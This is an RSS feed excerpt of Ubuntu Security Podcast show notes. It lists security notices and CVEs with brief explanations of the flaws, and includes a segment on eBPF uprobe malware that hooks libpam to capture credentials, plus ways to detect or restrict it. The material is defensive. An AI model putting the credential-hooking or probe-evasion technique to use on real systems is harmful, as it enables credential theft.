<li><a href="https://ubuntu.com/security/CVE-2023-2985">CVE-2023-2985</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25012">CVE-2023-25012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1998">CVE-2023-1998</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1859">CVE-2023-1859</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1670">CVE-2023-1670</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1079">CVE-2023-1079</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1077">CVE-2023-1077</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1076">CVE-2023-1076</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6224-1-usn-6228-1-linux-kernel-vulnerabilities--02-36">[<a href="https://ubuntu.com/security/notices/USN-6224-1">USN-6224-1</a>, <a href="https://ubuntu.com/security/notices/USN-6228-1">USN-6228-1</a>] Linux kernel vulnerabilities (02:36)</h3>
<ul>
<li>2 CVEs addressed in Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2176">CVE-2023-2176</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2124">CVE-2023-2124</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>6.2 Oracle, Azure, GCP, IBM, Raspi, AWS, KVM, Low latency</li>
</ul>
<h3 id="usn-6231-1-linux-kernel--oem--vulnerabilities--02-53">[<a href="https://ubuntu.com/security/notices/USN-6231-1">USN-6231-1</a>] Linux kernel (OEM) vulnerabilities (02:53)</h3>
<ul>
<li>5 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-3212">CVE-2023-3212</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3141">CVE-2023-3141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31084">CVE-2023-31084</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3090">CVE-2023-3090</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2124">CVE-2023-2124</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>6.1 OEM</li>
<li>OOB write due to uninitialized memory in packet control buffer for IP-VLAN
network driver</li>
</ul>
<h3 id="usn-6235-1-linux-kernel--oem--vulnerabilities--03-17">[<a href="https://ubuntu.com/security/notices/USN-6235-1">USN-6235-1</a>] Linux kernel (OEM) vulnerabilities (03:17)</h3>
<ul>
<li>8 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-35788">CVE-2023-35788</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2430">CVE-2023-2430</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2176">CVE-2023-2176</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2124">CVE-2023-2124</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1073">CVE-2023-1073</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0597">CVE-2023-0597</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0459">CVE-2023-0459</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4842">CVE-2022-4842</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>6.0 OEM</li>
<li>Flower, missing lock in <code>io_uring</code>
<ul>
<li><a href="/episode-202/#usn-6192-1-linux-kernel-vulnerabilities--03-10">[USN-6192-1] Linux kernel vulnerabilities from Episode 202</a></li>
</ul>
</li>
</ul>
<h3 id="usn-6219-1-ruby-vulnerabilities--03-32">[<a href="https://ubuntu.com/security/notices/USN-6219-1">USN-6219-1</a>] Ruby vulnerabilities (03:32)</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-36617">CVE-2023-36617</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28755">CVE-2023-28755</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>ReDoS in URI parser - only one issue really but fix for first was incomplete</li>
</ul>
<h3 id="usn-6216-1-lib3mf-vulnerability--04-09">[<a href="https://ubuntu.com/security/notices/USN-6216-1">USN-6216-1</a>] lib3mf vulnerability (04:09)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-21772">CVE-2021-21772</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF</li>
</ul>
<h3 id="usn-6225-1-knot-resolver-vulnerability--04-14">[<a href="https://ubuntu.com/security/notices/USN-6225-1">USN-6225-1</a>] Knot Resolver vulnerability (04:14)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-40188">CVE-2022-40188</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>CPU-based DoS due to high algorithmic complexity - requires an authoritative
server to return large address sets - fixed by adding a limit to various lookups etc</li>
</ul>
<h3 id="usn-6226-1-scipy-vulnerabilities--04-45">[<a href="https://ubuntu.com/security/notices/USN-6226-1">USN-6226-1</a>] SciPy vulnerabilities (04:45)</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-29824">CVE-2023-29824</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25399">CVE-2023-25399</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 issues in reference count handling - both appear to be disputed by
upstream - first, as it would only be able to triggered by first
deterministicly exhausting memory, the other since the only way to trigger it
would be to first be able to execute arbitrary Python code. Both were reported
by the same user who discovered them via static analysis</li>
</ul>
<h3 id="usn-6227-1-spidermonkey-vulnerabilities--05-47">[<a href="https://ubuntu.com/security/notices/USN-6227-1">USN-6227-1</a>] SpiderMonkey vulnerabilities (05:47)</h3>
<ul>
<li>2 CVEs addressed in Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-37211">CVE-2023-37211</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-37202">CVE-2023-37202</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>mozjs102 (102.13.0) - memory mishandling in JS engine</li>
</ul>
<h3 id="usn-6229-1-libtiff-vulnerabilities--06-00">[<a href="https://ubuntu.com/security/notices/USN-6229-1">USN-6229-1</a>] LibTIFF vulnerabilities (06:00)</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-3316">CVE-2023-3316</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-26966">CVE-2023-26966</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-26965">CVE-2023-26965</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25433">CVE-2023-25433</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 heap buffer overflows, one OOB read, one NULL ptr deref</li>
</ul>
<h3 id="usn-6230-1-postgresql-vulnerability--06-24">[<a href="https://ubuntu.com/security/notices/USN-6230-1">USN-6230-1</a>] PostgreSQL vulnerability (06:24)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2454">CVE-2023-2454</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-197/#usn-6104-1-postgresql-vulnerabilities--00-55">[USN-6104-1] PostgreSQL vulnerabilities from Episode 197</a></li>
</ul>
<h3 id="usn-6184-2-cups-vulnerability--06-34">[<a href="https://ubuntu.com/security/notices/USN-6184-2">USN-6184-2</a>] CUPS vulnerability (06:34)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-34241">CVE-2023-34241</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-201/#usn-6184-1-cups-vulnerability--03-55">[USN-6184-1] CUPS vulnerability from Episode 201</a></li>
</ul>
<h3 id="usn-6078-2-libwebp-vulnerability--06-43">[<a href="https://ubuntu.com/security/notices/USN-6078-2">USN-6078-2</a>] libwebp vulnerability (06:43)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1999">CVE-2023-1999</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-195/#usn-6078-1-libwebp-vulnerability--06-38">[USN-6078-1] libwebp vulnerability from Episode 195</a></li>
</ul>
<h3 id="usn-6183-2-bind-vulnerability--06-46">[<a href="https://ubuntu.com/security/notices/USN-6183-2">USN-6183-2</a>] Bind vulnerability (06:46)</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2911">CVE-2023-2911</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2828">CVE-2023-2828</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-201/#usn-6183-1-bind-vulnerabilities--00-53">[USN-6183-1] Bind vulnerabilities from Episode 201</a></li>
</ul>
<h3 id="usn-6233-1-yajl-vulnerabilities--06-56">[<a href="https://ubuntu.com/security/notices/USN-6233-1">USN-6233-1</a>] YAJL vulnerabilities (06:56)</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-33460">CVE-2023-33460</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24795">CVE-2022-24795</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16516">CVE-2017-16516</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Yet Another JSON library - used by i3, mpd, uwsgi, modsecurity, libvirt and others</li>
<li>Memory leak, buffer overflow on unicode parsing, integer overflow -&gt; heap
buffer overflow when handling inputs larger than 2GB</li>
</ul>
<h3 id="usn-6236-1-connman-vulnerabilities--07-33">[<a href="https://ubuntu.com/security/notices/USN-6236-1">USN-6236-1</a>] ConnMan vulnerabilities (07:33)</h3>
<ul>
<li>9 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-28488">CVE-2023-28488</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32293">CVE-2022-32293</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32292">CVE-2022-32292</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23098">CVE-2022-23098</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23097">CVE-2022-23097</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23096">CVE-2022-23096</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-26676">CVE-2021-26676</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33833">CVE-2021-33833</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-26675">CVE-2021-26675</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>a number of issues in internal gdhcp client - stack buffer overflow, OOB read
(info leak) - requires an attacker to run a malicious DHCP server - think
public wifi etc</li>
<li>UAF in WISPR HTTP handling (MiTM)</li>
<li>Heap buffer overflow gweb component - RCE</li>
<li>2 different OOB read in DNS proxy component - crash / info leak</li>
<li>Also an infinite loop in DNS proxy</li>
</ul>
<h3 id="usn-6237-1-curl-vulnerabilities--08-45">[<a href="https://ubuntu.com/security/notices/USN-6237-1">USN-6237-1</a>] curl vulnerabilities (08:45)</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-32001">CVE-2023-32001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28322">CVE-2023-28322</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28321">CVE-2023-28321</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Improperly matched wildcard patterns when doing certificate validation - in
particular could match a punycode-encoded IDN against an ascii wildcard of <code>x*</code>
as punycode names always start with <code>xn--</code></li>
<li>Logic error where would use the read callback to ask a remote client to ask
for data to send even if the same handle had been used previously for a PUT
request - unexpected behaviour for applications using curl, so could result in
potentially sending the wrong data (info leak) or a UAF etc.</li>
<li>Race condition on fopen() - used to save cookies etc to files - would first
check that file is a real file before opening - local attacker could race to
say replace it with a symlink instead to then get cookies written to a
different file etc.</li>
</ul>
<h2 id="the-dual-use-of-ebpf-as-both-a-tool-for-malware-and-a-tool-for-detecting-malware--10-34">The dual use of eBPF as both a tool for malware and a tool for detecting malware (10:34)</h2>
<ul>
<li>Interesting write-up on the use of eBPF by malware authors for hooking into
libpam to steal credentials
<ul>
<li><a href="https://blog.aquasec.com/detecting-ebpf-malware-with-tracee">https://blog.aquasec.com/detecting-ebpf-malware-with-tracee</a></li>
</ul>
</li>
<li><a href="https://github.com/citronneur/pamspy">pamspy</a> - uses eBPF uprobes - way of hooking into userspace functions from the
kernel using user-level return probe</li>
<li>requires to be root in the first place to be able to create a uretprobe
through <code>/sys/kernel/debug/tracing/uprobe_events</code> but once done, allows to then
have a BPF program executed every time the specified function within a
specified library / binary is executed - so by hooking libpam can then log the
credentials used by any user when logging in / authenticating for sudo etc.</li>
<li>More traditional approach would have been to use say <code>LD_PRELOAD</code> to hook into
the functions - but this requires that binaries get executed with this
environment set so is harder to achieve</li>
<li>But uretprobes have their own problems - implementation is based on
breakpoints so potentially be detected by the program which is being traced by
examining its own code (<code>.text</code> section) to look for breakpoint opcode (<code>0xCC</code>) or
it could look for the special memory mapping <code>[uprobes]</code> in <code>/proc/self/maps</code>
<ul>
<li><a href="https://blog.quarkslab.com/defeating-ebpf-uprobe-monitoring.html">https://blog.quarkslab.com/defeating-ebpf-uprobe-monitoring.html</a></li>
</ul>
</li>
<li>Potentially more easy to find that they are being used on a system as well by
just looking at the contents of <code>/sys/kernel/debug/tracing/uprobe_events</code> -
which lists all the uretprobes currently in use on the system</li>
<li>Interesting to see that (not surprisingly) each new technology can be used in
multiple ways - BPF+uprobes is a great way to do tracing of userspace code for
developers / sysadmins etc when debugging - but is also a great way for
malware authors to do the same</li>
<li>Also interesting to see the aquasec team mention the use of eBPF for system
monitoring / instrumentation to detect malware - ie. using an eBPF program to
detect malicious use of eBPF
<ul>
<li>but perhaps the best solution is to disable the use of eBPF by unprivileged
/ untrusted users and use seccomp or similar (via systemd units) to restrict
the use of eBPF to only those applications which really need it</li>
<li>then the only way for malware to use eBPF would be to compromise something
which already has access to eBPF - ie. the kernel itself or a privileged
process - ie. reducing the attack surface</li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E203.mp3" length="17897341" type="audio/mpeg" /><itunes:duration>1041</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 202
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-202/</link>
          <pubDate>Fri, 07 Jul 2023 16:41:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>dcd25643d17ef3404076fe3419f9229ee24472e1c2264105eb4338d0488a35e5eef0ed3a997528cdd9c750df5992c1bef4092a9bc21a6cc94b10bf5160af8e25</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 202</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          We take a sneak peek at the upcoming AppArmor 4.0 release, plus we cover
  vulnerabilities in AccountsService, the Linux Kernel, ReportLab, GNU Screen,
  containerd and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  We take a sneak peek at the upcoming AppArmor 4.0 release, plus we cover
  vulnerabilities in AccountsService, the Linux Kernel, ReportLab, GNU Screen,
  containerd and more.
  </itunes:summary>
        <description>  We take a sneak peek at the upcoming AppArmor 4.0 release, plus we cover
  vulnerabilities in AccountsService, the Linux Kernel, ReportLab, GNU Screen,
  containerd and more.
  </description>
        <googleplay:description>  We take a sneak peek at the upcoming AppArmor 4.0 release, plus we cover
  vulnerabilities in AccountsService, the Linux Kernel, ReportLab, GNU Screen,
  containerd and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>We take a sneak peek at the upcoming AppArmor 4.0 release, plus we cover
vulnerabilities in AccountsService, the Linux Kernel, ReportLab, GNU Screen,
containerd and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>50 unique CVEs addressed</p>
<h3 id="usn-6190-1-accountsservice-vulnerability--00-47">[<a href="https://ubuntu.com/security/notices/USN-6190-1">USN-6190-1</a>] AccountsService vulnerability (00:47)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-3297">CVE-2023-3297</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Mentioned in passing last week - reported to us by Kevin Backhouse from the
Github Security Lab team</li>
<li>DBus service that provides APIs to add, delete or modify system accounts - ie
create a new user etc</li>
<li>Originally developed by GNOME - used by gnome-control-center etc</li>
<li>Also allows to configure language / locale settings etc</li>
<li>In Ubuntu, we carry a custom patch which is used to synchronise the language
and locale from accountsservice to the local users <code>~/.pam_environment</code> file
which is used to configure various per-user session environment variables -
this way no matter how you log in to a Ubuntu system, the locale etc that you
configured via g-c-c etc gets used</li>
<li>Turned out there was a number of cases of UAF due to logic errors in the
original patch - so an unprivileged user could trigger this and crash the
accounts-daemon which runs as root</li>
</ul>
<h3 id="usn-6191-1-linux-kernel-regression--02-44">[<a href="https://ubuntu.com/security/notices/USN-6191-1">USN-6191-1</a>] Linux kernel regression (02:44)</h3>
<ul>
<li>Affecting Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)</li>
<li>Spurious warning message would be printed via the IPv6 subsystem</li>
</ul>
<h3 id="usn-6192-1-linux-kernel-vulnerabilities--03-10">[<a href="https://ubuntu.com/security/notices/USN-6192-1">USN-6192-1</a>] Linux kernel vulnerabilities (03:10)</h3>
<ul>
<li>2 CVEs addressed in Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2430">CVE-2023-2430</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35788">CVE-2023-35788</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Off-by-one in the flower network traffic classifier - flow based traffic
control filter - allows to define a &ldquo;flow&rdquo; by a set of key/value pairs
(ie. src MAC address, port number or various other types) - could be leveraged
for DoS or potential code execution - PoC posted publicly but even then was
stated that it doesn&rsquo;t even crash the kernel, however gdb can be used to
detect the OOB write</li>
<li>Mishandling of locking in the <code>io_uring</code> subsystem - local attacker could use
this to trigger a deadlock and hence a DoS</li>
<li>Possible info leak via stale page table entries - when KPTI was introduced in
the wake of Meltdown, to minimise the cost of flushing page table on every
entry/exit to/from kernel space, PCIDs are a hardware feature that was
introduced in more recent Intel processors to try and minimise this cost by
only flushing on exit back to userspace - this is done by issuing the <code>INVLPG</code>
instruction - but it was found that on certain hardware platforms this did not
actually flush the global TLB contrary to expectation - and so could leak
kernel memory back to userspace</li>
</ul>
<h3 id="usn-6193-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6193-1">USN-6193-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>1 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-35788">CVE-2023-35788</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>TC flower + INVLPG</li>
</ul>
<h3 id="usn-6194-1-linux-kernel--oem--vulnerabilities--06-04">[<a href="https://ubuntu.com/security/notices/USN-6194-1">USN-6194-1</a>] Linux kernel (OEM) vulnerabilities (06:04)</h3>
<ul>
<li>3 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2176">CVE-2023-2176</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2430">CVE-2023-2430</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35788">CVE-2023-35788</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><code>io_uring</code> and TC flower plus OOB read in InfiniBand RDMA driver - DoS / info
leak</li>
</ul>
<h3 id="usn-6195-1-vim-vulnerabilities--06-26">[<a href="https://ubuntu.com/security/notices/USN-6195-1">USN-6195-1</a>] Vim vulnerabilities (06:26)</h3>
<ul>
<li>6 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0696">CVE-2022-0696</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0407">CVE-2022-0407</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0393">CVE-2022-0393</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0158">CVE-2022-0158</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0156">CVE-2022-0156</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0128">CVE-2022-0128</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>More vim fuzzing results - OOB read, UAF, heap buffer overflow, NULL pointer
dereference etc.</li>
</ul>
<h3 id="usn-6196-1-reportlab-vulnerability--06-47">[<a href="https://ubuntu.com/security/notices/USN-6196-1">USN-6196-1</a>] ReportLab vulnerability (06:47)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-33733">CVE-2023-33733</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Python library for producing PDFs - often used to convert HTML to PDF etc</li>
<li>Bypass of validation originally put in place for a previous <a href="https://ubuntu.com/security/CVE-2019-17626">CVE-2019-17626</a>
(see <a href="/episode-62/#usn-4273-1-reportlab-vulnerability-05-48">[USN-4273-1] ReportLab vulnerability in Episode 62</a>)</li>
<li>That vuln was RCE since reportlab would call the python <code>eval()</code> function
directly on value obtained from an XML document</li>
<li>To fix that, introduced a complex validation scheme so they could still use
<code>eval()</code> without having to remove this functionality - new update disables this
by default and instead only allows a much limited subset of colors to be
parsed</li>
</ul>
<h3 id="usn-6197-1-openldap-vulnerability--08-48">[<a href="https://ubuntu.com/security/notices/USN-6197-1">USN-6197-1</a>] OpenLDAP vulnerability (08:48)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2953">CVE-2023-2953</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>NULL pointer deref in certain circumstances if failed to allocate memory
during various string handling operations - unlikely to be able to be
triggered easily (would first need a memory leak bug or similar&hellip;)</li>
</ul>
<h3 id="usn-6198-1-gnu-screen-vulnerability--09-25">[<a href="https://ubuntu.com/security/notices/USN-6198-1">USN-6198-1</a>] GNU Screen vulnerability (09:25)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-24626">CVE-2023-24626</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>screen provides an API to allow the processes under its controlled to be say
killed from another session - but would fail to check if the specified PID was
actually owned by the calling user - so if screen was setuid, would allow a
local user to send a SIGHUP to any other process on the system</li>
<li>In Ubuntu screen is not setuid so this was not a real issue</li>
</ul>
<h3 id="usn-6199-1-php-vulnerability--10-35">[<a href="https://ubuntu.com/security/notices/USN-6199-1">USN-6199-1</a>] PHP vulnerability (10:35)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-3247">CVE-2023-3247</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>When generating a nonce for use in HTTP Digest during SOAP authentication,
wouldn&rsquo;t actually check the return value from the call to generate random data
for the nonce - as such, the nonce would be whatever was previously in the
stack memory - so could leak info from the stack, or this could be say all
zeros which would defeat the purpose of the nonce</li>
</ul>
<h3 id="usn-6200-1-imagemagick-vulnerabilities--11-27">[<a href="https://ubuntu.com/security/notices/USN-6200-1">USN-6200-1</a>] ImageMagick vulnerabilities (11:27)</h3>
<ul>
<li>20 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-34151">CVE-2023-34151</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3195">CVE-2023-3195</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1289">CVE-2023-1289</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3428">CVE-2023-3428</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1906">CVE-2023-1906</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3610">CVE-2021-3610</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32547">CVE-2022-32547</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32546">CVE-2022-32546</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32545">CVE-2022-32545</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28463">CVE-2022-28463</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-39212">CVE-2021-39212</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20313">CVE-2021-20313</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20312">CVE-2021-20312</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20246">CVE-2021-20246</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20309">CVE-2021-20309</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20244">CVE-2021-20244</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20243">CVE-2021-20243</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20241">CVE-2021-20241</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20224">CVE-2021-20224</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29599">CVE-2020-29599</a> <!-- raw HTML omitted --></li>
</ul>
</li>
